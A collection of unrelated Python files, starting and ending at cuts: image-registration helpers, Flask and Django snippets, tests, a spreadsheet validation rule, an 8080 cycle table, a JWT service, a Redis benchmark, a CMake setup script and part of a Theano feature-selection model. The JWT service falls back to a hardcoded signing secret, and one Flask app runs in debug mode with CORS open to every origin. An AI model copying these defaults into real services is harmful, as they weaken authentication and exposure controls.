img_type='RGB_l',
mask_fp=None,
bounding_box=False):
if img_type in ['RGB_l', 'AF', 'in_memory', 'none']:
if img_type == "RGB_l":
out_image = RegImage(image_fp, 'sitk', img_res)
out_image.to_greyscale()
out_image.invert_intensity()
elif img_type == 'AF':
out_image = RegImage(image_fp, 'sitk', img_res)
if out_image.image.GetDepth() > 1:
out_image.compress_AF_channels('max')
if out_image.image.GetNumberOfComponentsPerPixel() == 3:
out_image.to_greyscale()
elif img_type == 'in_memory':
out_image = RegImage(
'from_file', 'sitk', img_res, load_image=False)
out_image.get_image_from_memory(image_fp)
else:
out_image = RegImage(image_fp, 'sitk', img_res)
if mask_fp != None:
if isinstance(mask_fp, sitk.Image) == True:
if out_image.image.GetSize() != mask_fp.GetSize():
print(
'Warning: reg image and mask do not have the same dimension'
)
out_image.mask = mask_fp
else:
out_image.load_mask(mask_fp, 'sitk')
if bounding_box == True:
out_image.get_mask_bounding_box()
out_image.crop_to_bounding_box()
else:
        print(img_type + " is an invalid image type (valid: 'RGB_l', 'AF', 'in_memory', 'none')")
return out_image
def parameter_load(reg_model):
"""Load a default regtoolboxMSRC registration parameter or one from file.
Parameters
----------
reg_model : str
a string of the default parameterMap name. If reg_model is not in the default list
it should be a filepath to a SimpleITK parameterMap
Returns
-------
SimpleITK parameterMap
"""
if isinstance(reg_model, str):
if reg_model in [
'affine', 'affine_test', 'fi_correction', 'nl', 'rigid',
'scaled_rigid', 'testing'
]:
reg_param = getattr(parameter_files(), reg_model)
return reg_param
else:
try:
reg_param = sitk.ReadParameterFile(reg_model)
return reg_param
except:
print('invalid parameter file')
else:
print(
'parameter input is not a filepath or default parameter file str')
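# A minimal usage sketch: 'affine' is one of the default parameter names listed above,
# while the commented .txt path is a hypothetical user-supplied elastix parameter file.
if __name__ == '__main__':
    affine_params = parameter_load('affine')
    # custom_params = parameter_load('/path/to/my_parameters.txt')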
|
from flask import g
class LineItem:
def __init__(self, username, order_id, menu_item_id):
self.username = username
self.order_id = order_id
self.menu_item_id = menu_item_id
@classmethod
def create(cls, username, order_id, menu_item_id):
query = """
INSERT INTO
lineitems
(username, order_id, item_id)
VALUES
(%s, %s, %s);
"""
with g.db.cursor() as cursor:
cursor.execute(query, (username,order_id, menu_item_id))
g.db.commit()
return cls(
username=username,
order_id=order_id,
menu_item_id=menu_item_id
)
@classmethod
def delete(cls, username, order_id, menu_item_id):
query = """
DELETE FROM
lineitems
WHERE username = %s AND order_id = %s and item_id = %s;
"""
with g.db.cursor() as cursor:
cursor.execute(query, (username,order_id, menu_item_id))
g.db.commit()
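# A minimal usage sketch (not executed here): LineItem expects to run inside a Flask
# request/app context where `g.db` is an open DB-API connection. The identifiers
# below are illustrative assumptions.
#
# with app.app_context():
#     item = LineItem.create('alice', order_id=7, menu_item_id=3)
#     LineItem.delete('alice', order_id=7, menu_item_id=3)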
|
from django.shortcuts import render
from django.views.generic import TemplateView
# Top page
class IndexView(TemplateView):
template_name = "index.html"
def get_context_data(self):
ctxt = super().get_context_data()
ctxt["username"] = "NAME"
return ctxt
# About page
class AboutView(TemplateView):
template_name = "about.html"
def get_context_data(self):
ctxt = super().get_context_data()
ctxt["num_services"] = 3
ctxt["skillset"] = [
"Python",
"JavaScript",
"HTML / CSS",
"PostgreSQL",
]
return ctxt
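# A minimal sketch (belonging in a separate, hypothetical urls.py) of how these
# TemplateView subclasses might be routed; the route names are assumptions.
#
# from django.urls import path
# from .views import IndexView, AboutView
#
# urlpatterns = [
#     path('', IndexView.as_view(), name='index'),
#     path('about/', AboutView.as_view(), name='about'),
# ]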
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import json
import sys
from django.urls import reverse
from nose.tools import assert_equal, assert_not_equal, assert_true, assert_false
from desktop.lib.django_test_util import make_logged_in_client
from useradmin.models import User
if sys.version_info[0] > 2:
from unittest.mock import patch, Mock, MagicMock
else:
from mock import patch, Mock, MagicMock
LOG = logging.getLogger(__name__)
class TestInstallExamples():
def setUp(self):
self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=True, is_admin=True)
self.user = User.objects.get(username="test")
def test_install_via_insert_mysql(self):
with patch('beeswax.views.beeswax_install_examples.SampleTable') as SampleTable:
with patch('beeswax.views.beeswax_install_examples.SampleQuery') as SampleQuery:
resp = self.client.post(reverse('beeswax:install_examples'), {'db_name': 'default'})
data = json.loads(resp.content)
assert_equal(0, data['status'], data)
assert_equal('', data['message'], data)
SampleTable.assert_called()
SampleQuery.assert_called()
|
import unittest
import asyncio
import asynctest
import asynctest.mock as amock
from opsdroid.__main__ import configure_lang
from opsdroid.core import OpsDroid
from opsdroid.connector import Connector
from opsdroid.__main__ import configure_lang
class TestConnectorBaseClass(unittest.TestCase):
"""Test the opsdroid connector base class."""
def setUp(self):
self.loop = asyncio.new_event_loop()
configure_lang({})
def test_init(self):
config = {"example_item": "test"}
connector = Connector(config, opsdroid=OpsDroid())
self.assertEqual(None, connector.default_room)
self.assertEqual("", connector.name)
self.assertEqual("test", connector.config["example_item"])
def test_property(self):
opsdroid = amock.CoroutineMock()
connector = Connector({"name": "shell"}, opsdroid=opsdroid)
self.assertEqual("shell", connector.configuration.get("name"))
def test_connect(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.connect())
def test_listen(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.listen())
def test_respond(self):
connector = Connector({}, opsdroid=OpsDroid())
with self.assertRaises(NotImplementedError):
self.loop.run_until_complete(connector.respond({}))
def test_react(self):
connector = Connector({}, opsdroid=OpsDroid())
reacted = self.loop.run_until_complete(connector.react({}, 'emoji'))
self.assertFalse(reacted)
def test_user_typing(self):
opsdroid = 'opsdroid'
connector = Connector({}, opsdroid=OpsDroid())
user_typing = self.loop.run_until_complete(
connector.user_typing(trigger=True))
assert user_typing is None
class TestConnectorAsync(asynctest.TestCase):
"""Test the async methods of the opsdroid connector base class."""
async def setup(self):
configure_lang({})
async def test_disconnect(self):
connector = Connector({}, opsdroid=OpsDroid())
res = await connector.disconnect()
assert res is None
|
#Rule 26 - In contact data file, the VOICE column must not contain any phone number or email ID
def no_phone_url_in_voice(fle, fleName, target):
import re
import os
import sys
import json
import openpyxl
import pandas as pd
from pandas import ExcelWriter
from pandas import ExcelFile
from dateutil.parser import parse
import validators
configFile = 'https://s3.us-east.cloud-object-storage.appdomain.cloud/sharad-saurav-bucket/Configuration.xlsx'
rule="No_phone_url_in_voice"
config=pd.read_excel(configFile)
newdf=config[config['RULE']==rule]
to_check=''
for index,row in newdf.iterrows():
to_check=row['TO_CHECK']
to_check=json.loads(to_check)
files_to_apply=to_check['files_to_apply']
columns_to_apply=to_check['columns_to_apply']
if(files_to_apply=='ALL' or fleName in files_to_apply):
def search_email(string):
email = re.findall(r'[\w\.-]+@[\w\.-]+', string)
if(len(email)!= 0):
return True
else:
return False
def find_phone(string):
phone = re.findall('\d{3}[-\.\s]??\d{3}[-\.\s]??\d{4}|\(\d{3}\)\s*\d{3}[-\.\s]??\d{4}|\d{3}[-\.\s]??\d{4}', string)
if(len(phone)!= 0):
return True
else:
return False
data=[]
df = pd.read_excel(fle)
df.index = range(2,df.shape[0]+2)
for index,row in df.iterrows():
for column_name in columns_to_apply:
column_value=row[column_name]
#print(voice)
if(pd.notnull(row[column_name])):
if(search_email(column_value)):
                        entry=[index,fleName,column_name+' has EMAIL in its contents']
                        print('The row '+str(index)+' in the file '+fleName+' has an email address in the '+column_name+' column')
data.append(entry)
if(find_phone(column_value)):
#print(index)
                        entry=[index,fleName,column_name+' has phone number in its contents']
                        print('The row '+str(index)+' in the file '+fleName+' has a phone number in the '+column_name+' column')
data.append(entry)
df1 = pd.DataFrame(data, columns = ['ROW_NO', 'FILE_NAME', 'COMMENTS'])
if(ExcelFile(target).sheet_names[0] == 'Sheet1'):
with ExcelWriter(target, engine='openpyxl', mode='w') as writer:
df1.to_excel(writer,sheet_name=rule,index=False)
else:
with ExcelWriter(target, engine='openpyxl', mode='a') as writer:
df1.to_excel(writer,sheet_name=rule,index=False)
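# A hedged usage sketch: the workbook paths below are hypothetical. The function reads
# the remote Configuration.xlsx, scans the configured columns of the source file for
# phone numbers and email addresses, and appends its findings to the target report.
#
# no_phone_url_in_voice('contact_data.xlsx', 'contact_data.xlsx', 'validation_report.xlsx')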
|
import os
from parallelm.pipeline import json_fields
def main_component_module(comp_desc):
main_module = os.path.splitext(comp_desc[json_fields.COMPONENT_DESC_PROGRAM_FIELD])[0]
return comp_desc[json_fields.COMPONENT_DESC_PACKAGE_FIELD] + "." + main_module
def assemble_cmdline_from_args(input_args):
cmdline_list = []
for arg in input_args:
cmdline_list.append("--" + arg)
cmdline_list.append(str(input_args[arg]))
return cmdline_list
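# A minimal runnable sketch of assemble_cmdline_from_args; the argument names and
# values are illustrative only.
if __name__ == '__main__':
    example_args = {"input-path": "/tmp/data.csv", "iterations": 3}
    print(assemble_cmdline_from_args(example_args))
    # -> ['--input-path', '/tmp/data.csv', '--iterations', '3']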
|
from common.commands import *
# Constants for getting number of cycles for special cases
REGULAR = 0 # For commands that performs always for the same number of cycles
REGISTER = 0 # For commands that processes registers
MEMORY = 1 # For commands that processes memory cell
NEXT_CMD = 0 # For return and call commands when condition is not satisfied
RET = 1 # For return commands when condition is satisfied
CALL = 1 # For call commands when condition is satisfied
cycles = {
# Move, load and store
mov: [5, 7], # 5 for registers, 7 for memory
mvi: [7, 10], # 7 for registers, 10 for memory
lxi: [10],
stax: [7],
ldax: [7],
sta: [13],
lda: [13],
shld: [16],
lhld: [16],
xchg: [4],
# Stack operations
push: [11],
pop: [10],
xthl: [18],
sphl: [5],
# Jump
jmp: [10],
jc: [10],
jnc: [10],
jz: [10],
jnz: [10],
jp: [10],
jm: [10],
jpe: [10],
jpo: [10],
pchl: [5],
# Call
call: [17],
cc: [11, 17], # 11 for next command, 17 for call
cnc: [11, 17], # 11 for next command, 17 for call
cz: [11, 17], # 11 for next command, 17 for call
cnz: [11, 17], # 11 for next command, 17 for call
cp: [11, 17], # 11 for next command, 17 for call
cm: [11, 17], # 11 for next command, 17 for call
cpe: [11, 17], # 11 for next command, 17 for call
cpo: [11, 17], # 11 for next command, 17 for call
# Return
ret: [10],
rc: [5, 11], # 5 for next command, 11 for return
rnc: [5, 11], # 5 for next command, 11 for return
rz: [5, 11], # 5 for next command, 11 for return
rnz: [5, 11], # 5 for next command, 11 for return
rp: [5, 11], # 5 for next command, 11 for return
rm: [5, 11], # 5 for next command, 11 for return
rpe: [5, 11], # 5 for next command, 11 for return
rpo: [5, 11], # 5 for next command, 11 for return
# Restart
rst: [11],
# Increment and decrement
inr: [5, 10], # 5 for registers, 10 for memory
dcr: [5, 10], # 5 for registers, 10 for memory
inx: [5],
dcx: [5],
# Add
add: [4, 7], # 4 for registers, 7 for memory
adc: [4, 7], # 4 for registers, 7 for memory
adi: [7],
aci: [7],
dad: [10],
# Subtract
sub: [4, 7], # 4 for registers, 7 for memory
sbb: [4, 7], # 4 for registers, 7 for memory
sui: [7],
sbi: [7],
# Logical
ana: [4, 7], # 4 for registers, 7 for memory
xra: [4, 7], # 4 for registers, 7 for memory
ora: [4, 7], # 4 for registers, 7 for memory
cmp: [4, 7], # 4 for registers, 7 for memory
ani: [7],
xri: [7],
ori: [7],
cpi: [7],
# Rotate
rlc: [4],
rrc: [4],
ral: [4],
rar: [4],
# Specials
cma: [4],
stc: [4],
cmc: [4],
daa: [4],
# Input/Output
in_cmd: [10],
out: [10],
# Control
ei: [4],
di: [4],
nop: [4],
hlt: [7]
}
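# A minimal helper sketch (the function name is an assumption, not part of the original
# module) showing how the index constants above select a variant: single-entry commands
# ignore the variant, two-entry commands pick register/memory or next-command/taken timing.
def get_cycles(command, variant=REGULAR):
    counts = cycles[command]
    return counts[variant] if variant < len(counts) else counts[0]
# e.g. get_cycles(mov, MEMORY) -> 7, get_cycles(rc, RET) -> 11, get_cycles(jmp) -> 10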
|
# -*- coding: utf-8 -*-
import jwt
from jwt import InvalidTokenError
from datetime import datetime, timedelta
from rust.core.exceptions import BusinessError
import settings
SECRET = 'aSsJKgdAH2Dkaj1shd4ahsh' if not hasattr(settings, 'JWT_SECRET') else settings.JWT_SECRET
CURRENT_TOKEN = None
class JWTService(object):
@staticmethod
def get_current():
return CURRENT_TOKEN
@staticmethod
def set_current(token):
global CURRENT_TOKEN
CURRENT_TOKEN = token
def encode(self, data):
ext_sec = 2*60*60 if not hasattr(settings, 'JWT_EXT_SEC') else settings.JWT_EXT_SEC
payload = {
'data': data,
'exp': datetime.now() + timedelta(seconds=ext_sec)
}
return jwt.encode(payload, SECRET, algorithm='HS256')
def decode(self, token):
try:
            payload = jwt.decode(token, SECRET, algorithms=['HS256'])
except InvalidTokenError:
            raise BusinessError(u'Invalid token')
return payload['data']
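# A minimal usage sketch, assuming `settings` and PyJWT are importable as above; the
# payload is illustrative. encode() wraps data with an expiry of JWT_EXT_SEC seconds,
# decode() returns the original data or raises BusinessError on an invalid token.
if __name__ == '__main__':
    service = JWTService()
    token = service.encode({'user_id': 42})
    print(service.decode(token))  # -> {'user_id': 42}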
|
# coding: utf-8
from __future__ import print_function
import time
from twisted.internet import defer
from twisted.internet import reactor
import txredisapi as redis
HOST = 'localhost'
PORT = 6379
N = 1000
@defer.inlineCallbacks
def test_setget():
key = 'test'
conn = yield redis.Connection(HOST, PORT)
start = time.time()
for i in xrange(N):
yield conn.set(key, 'test_data')
yield conn.get(key)
print("done set-get: %.4fs." % ((time.time() - start) / N))
@defer.inlineCallbacks
def test_lrange():
key = 'test_list'
list_length = 1000
conn = yield redis.Connection(HOST, PORT)
yield defer.DeferredList([conn.lpush(key, str(i)) for i in xrange(list_length)])
start = time.time()
for i in xrange(N):
yield conn.lrange(key, 0, 999)
print("done lrange: %.4fs." % ((time.time() - start) / N))
@defer.inlineCallbacks
def run():
yield test_setget()
yield test_lrange()
reactor.stop()
run()
reactor.run()
|
from flask import Flask, request, jsonify
from scraper import run
app = Flask(__name__)
app.config["DEBUG"] = True
items = []
@app.route('/news-items', methods=['GET'])
def api_all():
global items
if not items:
items = run()
response = jsonify(items)
response.headers.add("Access-Control-Allow-Origin", "*")
return response
app.run()
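# A hedged client-side sketch (run from another process while the app above is serving
# on Flask's default port); `requests` is an assumption, not a dependency of this file.
#
# import requests
# print(requests.get('http://127.0.0.1:5000/news-items').json())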
|
# -*- coding: utf-8 -*-
import os
import platform
import re
import subprocess
import sys
from distutils.version import LooseVersion
from setuptools import setup, find_packages, Extension
from setuptools.command.build_ext import build_ext
def fix_includes_hack():
# IDK what happened to the GitHub Actions container image, but suddenly the build started
# failing on Windows with this error:
# MSIWarp\src\lib\warp\warp.cpp(375,32): error C3861: 'back_inserter': identifier not found
header_contents = open('MSIWarp/src/lib/warp/warp.hpp', 'rt').read()
if '<iterator>' not in header_contents:
header_contents = header_contents.replace(
'#include <vector>', '#include <vector>\n#include <iterator>'
)
open('MSIWarp/src/lib/warp/warp.hpp', 'wt').write(header_contents)
## This CMakeExtension stuff is part of MSIWarp vendoring (bundling a built copy of their library with our library)
## It's hacky and should be removed as soon as there's a MSIWarp package available on PyPI
class CMakeExtension(Extension):
def __init__(self, name, sourcedir=''):
Extension.__init__(self, name, sources=[])
self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
def run(self):
fix_includes_hack()
try:
out = subprocess.check_output(['cmake', '--version'])
except OSError:
raise RuntimeError(
"CMake must be installed to build the following extensions: "
+ ", ".join(e.name for e in self.extensions)
)
if platform.system() == "Windows":
cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1))
if cmake_version < '3.1.0':
raise RuntimeError("CMake >= 3.1.0 is required on Windows")
for ext in self.extensions:
self.build_extension(ext)
def build_extension(self, ext):
extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))
cmake_args = [
'-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,
'-DPYTHON_EXECUTABLE=' + sys.executable,
]
cfg = 'Debug' if self.debug else 'Release'
build_args = ['--config', cfg]
if platform.system() == "Windows":
cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)]
if sys.maxsize > 2 ** 32:
cmake_args += ['-A', 'x64']
build_args += ['--', '/m']
else:
cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]
build_args += ['--', '-j2']
env = os.environ.copy()
env['CXXFLAGS'] = '{} -DVERSION_INFO=\\"{}\\"'.format(
env.get('CXXFLAGS', ''), self.distribution.get_version()
)
if not os.path.exists(self.build_temp):
os.makedirs(self.build_temp)
subprocess.check_call(['cmake', ext.sourcedir] + cmake_args, cwd=self.build_temp, env=env)
subprocess.check_call(['cmake', '--build', '.'] + build_args, cwd=self.build_temp)
print() # Add an empty line for cleaner output
setup(
name='msi_recal',
version='0.2.3',
description='Pipeline for mostly unsupervised recalibration of imzML mass spectrometry data',
url='https://github.com/metaspace2020/metaspace/tree/master/metaspace/recal',
author='Alexandrov Team, EMBL',
package_dir={
'msiwarp': 'MSIWarp/src/python-bindings/msiwarp',
'': '.',
},
packages=[*find_packages(), 'msiwarp', 'msiwarp.util'],
package_data={'msi_recal': ['dbs/*.csv']},
install_requires=[
'numpy',
'scipy',
'matplotlib',
'seaborn',
'pyimzml',
'pyMSpec',
'cpyMSpec',
'scikit-learn',
'typing-extensions; python_version < "3.8"',
],
# Vendorize MSIWarp because it's not on PyPI yet
ext_modules=[CMakeExtension('msiwarp/msiwarp_cpp')],
cmdclass={"build_ext": CMakeBuild},
)
|
#!/usr/bin/env python
# Copyright (C) 2006 by Johannes Zellner, <johannes@zellner.org>
# modified by mac@calmar.ws to fit my output needs
import sys
import os
def echo(msg):
os.system('echo -n "' + str(msg) + '"')
def out(n):
os.system("tput setab " + str(n) + "; echo -n " + ("\"% 4d\"" % n))
os.system("tput setab 0")
# normal colors 1 - 16
os.system("tput setaf 16")
for n in range(8):
out(n)
echo ("\n")
for n in range(8, 16):
out(n)
echo("\n")
echo("\n")
y=16
while y < 231:
for z in range(0,6):
out(y)
y += 1
echo("\n")
echo("\n")
for n in range(232, 256):
out(n)
if n == 237 or n == 243 or n == 249:
echo ("\n")
echo("\n")
|
"""
A module of deep feature selection based on multilayer perceptrons.
This module applies a deep structure with not too many hidden layers.
Thus, stochastic gradient descent (back-prop) is used in optimization.
Copyright (c) 2008-2013, Theano Development Team All rights reserved.
Yifeng Li
CMMT, UBC, Vancouver
Sep 23, 2014
Contact: yifeng.li.cn@gmail.com
"""
from __future__ import division
import pickle
import time
import math
import copy
import numpy
import theano
import theano.tensor as T
from logistic_sgd import LogisticRegression
import classification as cl
def relu(x):
return 0.5*(x+abs(x))
class InputLayer(object):
def __init__(self, input, n_in, w=None):
"""
In the input layer x_i is multiplied by w_i.
Yifeng Li, in UBC.
Aug 26, 2014.
"""
self.input=input
if w is None:
w_values = numpy.ones((n_in,), dtype=theano.config.floatX)
# w_values = numpy.asarray(rng.uniform(
# low=0, high=1,
# size=(n_in,)), dtype=theano.config.floatX)
w = theano.shared(value=w_values, name='w', borrow=True)
self.w=w
#u_values = numpy.ones((n_in,), dtype=theano.config.floatX)
#u = theano.shared(value=u_values, name='u', borrow=True)
#self.u=u # auxiliary variable for non-negativity
self.output = self.w * self.input
#self.params=[w,u]
self.params=[w]
def get_predicted(self,data):
return self.w * data
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out, W=None, b=None,
activation=T.tanh):
"""
Typical hidden layer of a MLP: units are fully-connected and have
sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)
and the bias vector b is of shape (n_out,).
NOTE : The nonlinearity used here is tanh by default.
Hidden unit activation is thus given by: tanh(dot(input,W) + b)
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dmatrix
:param input: a symbolic tensor of shape (n_examples, n_in)
:type n_in: int
:param n_in: dimensionality of input
:type n_out: int
:param n_out: number of hidden units
:type activation: theano.Op or function
:param activation: Non linearity to be applied in the hidden
layer
"""
self.input = input
# `W` is initialized with `W_values` which is uniformely sampled
# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))
# for tanh activation function
# the output of uniform if converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
# Note : optimal initialization of weights is dependent on the
# activation function used (among other things).
# For example, results presented in [Xavier10] suggest that you
# should use 4 times larger initial weights for sigmoid
# compared to tanh
# We have no info for other function, so we use the same as
# tanh.
self.activation=activation
if W is None:
W_values = numpy.asarray(rng.uniform(
low=-numpy.sqrt(6. / (n_in + n_out)),
high=numpy.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)), dtype=theano.config.floatX)
if activation == theano.tensor.nnet.sigmoid:
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = numpy.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (lin_output if activation is None
else activation(lin_output))
# parameters of the model
self.params = [self.W, self.b]
def get_predicted(self,data):
lin_output = T.dot(data, self.W) + self.b
output = (lin_output if self.activation is None
else self.activation(lin_output))
return output
class DFS(object):
"""
Deep feature selection class. One-one input layer + MLP.
"""
def __init__(self, rng, n_in, n_hidden, n_out, x=None, y=None, activation=T.tanh,
lambda1=0.001, lambda2=1.0, alpha1=0.001, alpha2=0.0):
"""Initialize the parameters for the DFL class.
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_hidden: int
:param n_hidden: number of hidden units
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
activation: activation function, from {T.tanh, T.nnet.sigmoid}
lambda1: float scalar, control the sparsity of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda1 is, the sparser the input weights are.
lambda2: float scalar, control the smoothness of the input weights.
The regularization term is lambda1( (1-lambda2)/2 * ||w||_2^2 + lambda2 * ||w||_1 ).
Thus, the larger lambda2 is, the smoother the input weights are.
alpha1: float scalar, control the sparsity of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha1 is, the sparser the MLP weights are.
alpha2: float scalar, control the smoothness of the weight matrices in MLP.
The regularization term is alpha1( (1-alpha2)/2 * \sum||W_i||_2^2 + alpha2 \sum||W_i||_1 ).
Thus, the larger alpha2 is, the smoother the MLP weights are.
"""
if not x:
x=T.matrix('x')
self.x=x
if not y:
y=T.ivector('y')
self.y=y
self.hidden_layers=[]
self.params=[]
self.n_layers=len(n_hidden)
input_layer=InputLayer(input=self.x,n_in=n_in)
self.params.extend(input_layer.params)
self.input_layer=input_layer
for i in range(len(n_hidden)):
if i==0: # first hidden layer
hd=HiddenLayer(rng=rng, input=self.input_layer.output, n_in=n_in, n_out=n_hidden[i],
activation=activation)
else:
hd=HiddenLayer(rng=rng, input=self.hidden_layers[i-1].output, n_in=n_hidden[i-1], n_out=n_hidden[i],
activation=activation)
self.hidden_layers.append(hd)
self.params.extend(hd.params)
# The logistic regression layer gets as input the hidden units
# of the hidden layer
if len(n_hidden)<=0:
self.logRegressionLayer = LogisticRegression(
input=self.input_layer.output,
n_in=n_in,
n_out=n_out)
else:
self.logRegressionLayer = LogisticRegression(
input=self.hidden_layers[-1].output,
n_in=n_hidden[-1],
n_out=n_out)
self.params.extend(self.logRegressionLayer.params)
# regularization terms
self.L1_input=T.abs_(self.input_layer.w).sum()
self.L2_input=(self.input_layer.w **2).sum()
self.hinge_loss_neg=(T.maximum(0,-self.input_layer.w)).sum() # penalize negative values
self.hinge_loss_pos=(T.maximum(0,self.input_layer.w)).sum() # # penalize positive values
L1s=[]
L2_sqrs=[]
#L1s.append(abs(self.hidden_layers[0].W).sum())
for i in range(len(n_hidden)):
L1s.append (T.abs_(self.hidden_layers[i].W).sum())
L2_sqrs.append((self.hidden_layers[i].W ** 2).sum())
L1s.append(T.abs_(self.logRegressionLayer.W).sum())
L2_sqrs.append((self.logRegressionLayer.W ** 2).sum())
self.L1 = T.sum(L1s)
self.L2_sqr = T.sum(L2_sqrs)
# negative log likelihood of the MLP is given by the negative
# log likelihood of the output of the model, computed in the
# logistic regression layer
self.negative_log_likelihood = self.logRegressionLayer.negative_log_likelihood
# same holds for the function computing the number of errors
self.errors = self.logRegressionLayer.errors(self.y)
# lambda3=0.5
# self.cost = self.negative_log_likelihood(self.y) \
# + lambda1*(1.0-lambda2)*0.5*self.L2_input \
# + lambda1*lambda2*(1.0-lambda3)*self.hinge_loss_pos \
# + lambda1*lambda2*lambda3*self.hinge_loss_neg \
# + alpha1*(1.0-alpha2)*0.5 * self.L2_sqr + alpha1*alpha2 * self.L1
self.cost = self.negative_log_likelihood(self.y) \
+ lambda1*(1.0-lambda2)*0.5*self.L2_input \
+ lambda1*lambda2*self.L1_input \
+ alpha1*(1.0-alpha2)*0.5* self.L2_sqr + alpha1*alpha2 * self.L1
#self.cost = self.negative_log_likelihood(self.y) \
# + lambda1*(1.0-lambda2)*(0.5/n_in)*self.L2_input \
# + lambda1*lambda2*(1/n_in)*self.L1_input \
# + alpha1*(1.0-alpha2)*0.5 * self.L2_sqr + alpha1*alpha2 * self.L1
self.y_pred=self.logRegressionLayer.y_pred
self.y_pred_prob=self.logRegressionLayer.y_pred_prob
def build_train_function(self, train_set_x, train_set_y, batch_size, alpha, learning_rate_shared):
"""
Create a function to compute the mistakes that are made by the model.
"""
index = T.lscalar('index') # index to a [mini]batch
# compute the gradients with respect to the model parameters
grads = T.grad(self.cost, self.params)
# add momentum
# initialize the delta_i-1
delta_before=[]
for param_i in self.params:
delta_before_i=theano.shared(value=numpy.zeros(param_i.get_value().shape))
delta_before.append(delta_before_i)
updates = []
for param_i, grad_i, delta_before_i in zip(self.params, grads, delta_before):
delta_i=-learning_rate_shared * grad_i + alpha*delta_before_i
updates.append((param_i, param_i + delta_i ))
updates.append((delta_before_i,delta_i))
train_model_cost = theano.function([index], self.cost, updates=updates,
givens={
self.x: train_set_x[index * batch_size: (index + 1) * batch_size],
self.y: train_set_y[index * batch_size: (index + 1) * batch_size]},
name='train')
return train_model_cost
def build_valid_function(self,valid_set_x, valid_set_y, batch_size):
"""
Build symbolic validation function.
"""
n_valid_batches = int(math.ceil(valid_set_x.get_value(borrow=True).shape[0] / batch_size))
index = T.lscalar('index') # index to a [mini]batch
valid_error_i = theano.function([index], self.errors,
givens={self.x: valid_set_x[index * batch_size:(index + 1) * batch_size],
self.y: valid_set_y[index * batch_size:(index + 1) * batch_size]},
name='valid')
# Create a function that scans the entire validation set
def valid_error():
return [valid_error_i(i) for i in xrange(n_valid_batches)]
return valid_error
def build_test_function(self, test_set_x, batch_size):
"""
Build symbolic test function.
"""
n_test_batches = int(math.ceil(test_set_x.get_value(borrow=True).shape[0] / batch_size))
index = T.lscalar('index') # index to a [mini]batch
test_pred_i = theano.function([index], [self.y_pred,self.y_pred_prob],
givens={self.x: test_set_x[index * batch_size : (index + 1) * batch_size]},
name='test')
# Create a function that scans the entire test set
def test_pred():
y_pred=[]
y_pred_prob=[]
for i in xrange(n_test_batches):
label,prob=test_pred_i(i)
y_pred.extend(label)
y_pred_prob.extend(prob)
return y_pred,y_pred_prob
return test_pred
def get_predicted(self,data):
for i in range(len(self.hidden_layers)):
data=self.hidden_layers[i].get_predicted(data)
p_y_given_x = T.nnet.softmax(T.dot(data, self.logRegressionLayer.W) + self.logRegressionLayer.b)
y_pred = T.argmax(p_y_given_x, axis=1)
y_pred_prob = T.argmax(p_y_given_x, axis=1)
return y_pred,y_pred_prob
def get_params(self):
return copy.deepcopy(self.params)
def set_params(self, given_params):
self.params=given_params
def print_params(self):
for param in self.params:
print param.get_value(borrow=True)
def save_params(self,filename):
f=open(filename,'w') # remove existing file
f.close()
f=open(filename,'a')
for param in self.params:
pickle.dump(param.get_value(borrow=True),f)
f.close()
def read_params(filename):
f=open(filename,'r')
params=pickle.load(f)
f.close()
return params
def train_model(train_set_x_org=None, train_set_y_org=None, valid_set_x_org=None, valid_set_y_org=None,
learning_rate=0.1, alpha=0.01,
lambda1=0.001, lambda2=1.0, alpha1=0.001, alpha2=0.0,
n_hidden=[256,128,16], n_epochs=1000, batch_size=100,
activation_func="tanh", rng=numpy.random.RandomState(100),
max_num_epoch_change_learning_rate=100,max_num_epoch_change_rate=0.8,learning_rate_decay_rate=0.8):
"""
Train a deep feature selection model.
INPUTS:
train_set_x_org: numpy 2d array, each row is a training sample.
train_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of training samples.
valid_set_x_org: numpy 2d array, each row is a validation sample.
This set is to monitor the convergence of optimization.
valid_set_y_org: numpy vector of type int {0,1,...,C-1}, class labels of validation samples.
learning_rate: float scalar, the initial learning rate.
alpha: float, parameter to trade off the momentum term.
lambda1: float scalar, control the sparsity of the input weights.
